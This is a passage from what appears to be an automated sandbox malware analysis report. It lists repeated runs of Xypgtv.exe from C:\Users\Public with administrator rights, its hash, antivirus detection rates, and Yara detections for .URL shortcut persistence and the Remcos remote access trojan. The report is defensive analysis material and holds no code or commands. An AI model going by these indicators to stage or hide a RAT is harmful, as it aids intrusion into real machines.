                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000009.00000003.729900326.0000000002410000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000009.00000003.731801392.0000000002444000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000009.00000003.730552799.0000000002444000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000009.00000003.731106098.0000000002444000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000009.00000003.731257935.0000000002444000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000009.00000003.729493553.0000000002428000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000009.00000003.728627251.000000000243C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 00000009.00000003.731519002.0000000002444000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                          Antivirus matches:
                                          • Detection: 100%, Joe Sandbox ML
                                          • Detection: 41%, ReversingLabs
                                          Reputation:low

                                          General

                                          Start time:09:40:32
                                          Start date:04/06/2021
                                          Path:C:\Users\Public\Xypgtv\Xypgtv.exe
                                          Wow64 process (32bit):true
                                          Commandline:'C:\Users\Public\Xypgtv\Xypgtv.exe'
                                          Imagebase:0x400000
                                          File size:690178 bytes
                                          MD5 hash:10D42F55D89B6FD42404E470E68F1996
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:Borland Delphi
                                          Yara matches:
                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000B.00000003.749959961.0000000002820000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000B.00000003.749327450.000000000284C000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000B.00000003.750252073.0000000002854000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000B.00000003.751417519.0000000002854000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000B.00000003.750787460.0000000002854000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000B.00000003.749703567.0000000002838000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000B.00000003.751016095.0000000002854000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                          • Rule: Methodology_Contains_Shortcut_OtherURIhandlers, Description: Detects possible shortcut usage for .URL persistence, Source: 0000000B.00000003.750523839.0000000002854000.00000004.00000001.sdmp, Author: @itsreallynick (Nick Carr)
                                          Reputation:low

                                          General

                                          Start time:09:40:54
                                          Start date:04/06/2021
                                          Path:C:\Users\Public\Xypgtv\Xypgtv.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\Public\Xypgtv\Xypgtv.exe
                                          Imagebase:0x400000
                                          File size:690178 bytes
                                          MD5 hash:10D42F55D89B6FD42404E470E68F1996
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000002.778791601.0000000000449000.00000002.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000000.777883581.0000000000449000.00000002.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000000.777134487.0000000000449000.00000002.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000F.00000000.776696975.0000000000449000.00000004.00000001.sdmp, Author: Joe Security
                                          Reputation:low

                                          General

                                          Start time:09:41:03
                                          Start date:04/06/2021
                                          Path:C:\Users\Public\Xypgtv\Xypgtv.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Users\Public\Xypgtv\Xypgtv.exe
                                          Imagebase:0x400000
                                          File size:690178 bytes
                                          MD5 hash:10D42F55D89B6FD42404E470E68F1996
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000000.795919569.0000000000449000.00000004.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000000.797923003.0000000000449000.00000002.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000000.796293762.0000000000449000.00000002.00000001.sdmp, Author: Joe Security
                                          • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000011.00000002.798843830.0000000000449000.00000002.00000001.sdmp, Author: Joe Security
                                          Reputation:low

                                          Disassembly

                                          Code Analysis

                                          Reset < >